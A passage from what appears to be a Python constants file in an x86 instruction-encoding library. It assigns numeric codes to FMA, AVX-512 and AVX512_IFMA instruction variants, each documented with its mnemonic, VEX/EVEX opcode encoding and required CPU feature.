``VEX.256.66.0F38.W1 AA /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3468
"""
``VFMSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3469
"""
``VFMSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3470
"""
``VFMSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3471
"""
``VFMSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3472
"""
``VFMSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3473
"""
``VFMSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FNMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3474
"""
``V4FNMADDPS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 AA /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFMSUB213SS_XMM_XMM_XMMM32: int = 3475
"""
``VFMSUB213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AB /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213SD_XMM_XMM_XMMM64: int = 3476
"""
``VFMSUB213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AB /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3477
"""
``VFMSUB213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3478
"""
``VFMSUB213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FNMADDSS_XMM_K1Z_XMMP3_M128: int = 3479
"""
``V4FNMADDSS xmm1 {k1}{z}, xmm2+3, m128``
``EVEX.LIG.F2.0F38.W0 AB /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFNMADD213PS_XMM_XMM_XMMM128: int = 3480
"""
``VFNMADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PS_YMM_YMM_YMMM256: int = 3481
"""
``VFNMADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PD_XMM_XMM_XMMM128: int = 3482
"""
``VFNMADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PD_YMM_YMM_YMMM256: int = 3483
"""
``VFNMADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 AC /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3484
"""
``VFNMADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3485
"""
``VFNMADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3486
"""
``VFNMADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AC /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3487
"""
``VFNMADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3488
"""
``VFNMADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3489
"""
``VFNMADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AC /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD213SS_XMM_XMM_XMMM32: int = 3490
"""
``VFNMADD213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AD /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213SD_XMM_XMM_XMMM64: int = 3491
"""
``VFNMADD213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AD /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3492
"""
``VFNMADD213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AD /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3493
"""
``VFNMADD213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AD /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB213PS_XMM_XMM_XMMM128: int = 3494
"""
``VFNMSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PS_YMM_YMM_YMMM256: int = 3495
"""
``VFNMSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PD_XMM_XMM_XMMM128: int = 3496
"""
``VFNMSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PD_YMM_YMM_YMMM256: int = 3497
"""
``VFNMSUB213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 AE /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3498
"""
``VFNMSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3499
"""
``VFNMSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3500
"""
``VFNMSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AE /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3501
"""
``VFNMSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3502
"""
``VFNMSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3503
"""
``VFNMSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AE /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB213SS_XMM_XMM_XMMM32: int = 3504
"""
``VFNMSUB213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AF /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213SD_XMM_XMM_XMMM64: int = 3505
"""
``VFNMSUB213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AF /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3506
"""
``VFNMSUB213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3507
"""
``VFNMSUB213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_XMM_K1Z_XMM_XMMM128B64: int = 3508
"""
``VPMADD52LUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B4 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_YMM_K1Z_YMM_YMMM256B64: int = 3509
"""
``VPMADD52LUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B4 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3510
"""
``VPMADD52LUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 B4 /r``
``AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_XMM_K1Z_XMM_XMMM128B64: int = 3511
"""
``VPMADD52HUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B5 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_YMM_K1Z_YMM_YMMM256B64: int = 3512
"""
``VPMADD52HUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B5 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3513
"""
``VPMADD52HUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 B5 /r``
``AVX512_IFMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PS_XMM_XMM_XMMM128: int = 3514
"""
``VFMADDSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PS_YMM_YMM_YMMM256: int = 3515
"""
``VFMADDSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PD_XMM_XMM_XMMM128: int = 3516
"""
``VFMADDSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PD_YMM_YMM_YMMM256: int = 3517
"""
``VFMADDSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B6 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3518
"""
``VFMADDSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3519
"""
``VFMADDSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3520
"""
``VFMADDSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3521
"""
``VFMADDSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3522
"""
``VFMADDSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3523
"""
``VFMADDSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B6 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PS_XMM_XMM_XMMM128: int = 3524
"""
``VFMSUBADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PS_YMM_YMM_YMMM256: int = 3525
"""
``VFMSUBADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PD_XMM_XMM_XMMM128: int = 3526
"""
``VFMSUBADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PD_YMM_YMM_YMMM256: int = 3527
"""
``VFMSUBADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B7 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3528
"""
``VFMSUBADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3529
"""
``VFMSUBADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3530
"""
``VFMSUBADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B7 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3531
"""
``VFMSUBADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3532
"""
``VFMSUBADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3533
"""
``VFMSUBADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B7 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD231PS_XMM_XMM_XMMM128: int = 3534
"""
``VFMADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PS_YMM_YMM_YMMM256: int = 3535
"""
``VFMADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PD_XMM_XMM_XMMM128: int = 3536
"""
``VFMADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PD_YMM_YMM_YMMM256: int = 3537
"""
``VFMADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B8 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3538
"""
``VFMADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3539
"""
``VFMADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3540
"""
``VFMADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B8 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3541
"""
``VFMADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3542
"""
``VFMADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3543
"""
``VFMADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B8 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD231SS_XMM_XMM_XMMM32: int = 3544
"""
``VFMADD231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 B9 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231SD_XMM_XMM_XMMM64: int = 3545
"""
``VFMADD231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 B9 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3546
"""
``VFMADD231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 B9 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3547
"""
``VFMADD231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 B9 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB231PS_XMM_XMM_XMMM128: int = 3548
"""
``VFMSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231PS_YMM_YMM_YMMM256: int = 3549
"""
``VFMSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231PD_XMM_XMM_XMMM128: int = 3550
"""
``VFMSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231PD_YMM_YMM_YMMM256: int = 3551
"""
``VFMSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BA /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3552
"""
``VFMSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3553
"""
``VFMSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3554
"""
``VFMSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3555
"""
``VFMSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3556
"""
``VFMSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3557
"""
``VFMSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BA /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB231SS_XMM_XMM_XMMM32: int = 3558
"""
``VFMSUB231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BB /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231SD_XMM_XMM_XMMM64: int = 3559
"""
``VFMSUB231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BB /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3560
"""
``VFMSUB231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3561
"""
``VFMSUB231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BB /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD231PS_XMM_XMM_XMMM128: int = 3562
"""
``VFNMADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PS_YMM_YMM_YMMM256: int = 3563
"""
``VFNMADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PD_XMM_XMM_XMMM128: int = 3564
"""
``VFNMADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PD_YMM_YMM_YMMM256: int = 3565
"""
``VFNMADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BC /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3566
"""
``VFNMADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3567
"""
``VFNMADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3568
"""
``VFNMADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BC /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3569
"""
``VFNMADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3570
"""
``VFNMADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3571
"""
``VFNMADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BC /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD231SS_XMM_XMM_XMMM32: int = 3572
"""
``VFNMADD231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BD /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231SD_XMM_XMM_XMMM64: int = 3573
"""
``VFNMADD231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BD /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3574
"""
``VFNMADD231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BD /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3575
"""
``VFNMADD231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BD /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB231PS_XMM_XMM_XMMM128: int = 3576
"""
``VFNMSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PS_YMM_YMM_YMMM256: int = 3577
"""
``VFNMSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PD_XMM_XMM_XMMM128: int = 3578
"""
``VFNMSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PD_YMM_YMM_YMMM256: int = 3579
"""
``VFNMSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BE /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3580
"""
``VFNMSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3581
"""
``VFNMSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3582
"""
``VFNMSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BE /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3583
"""
``VFNMSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
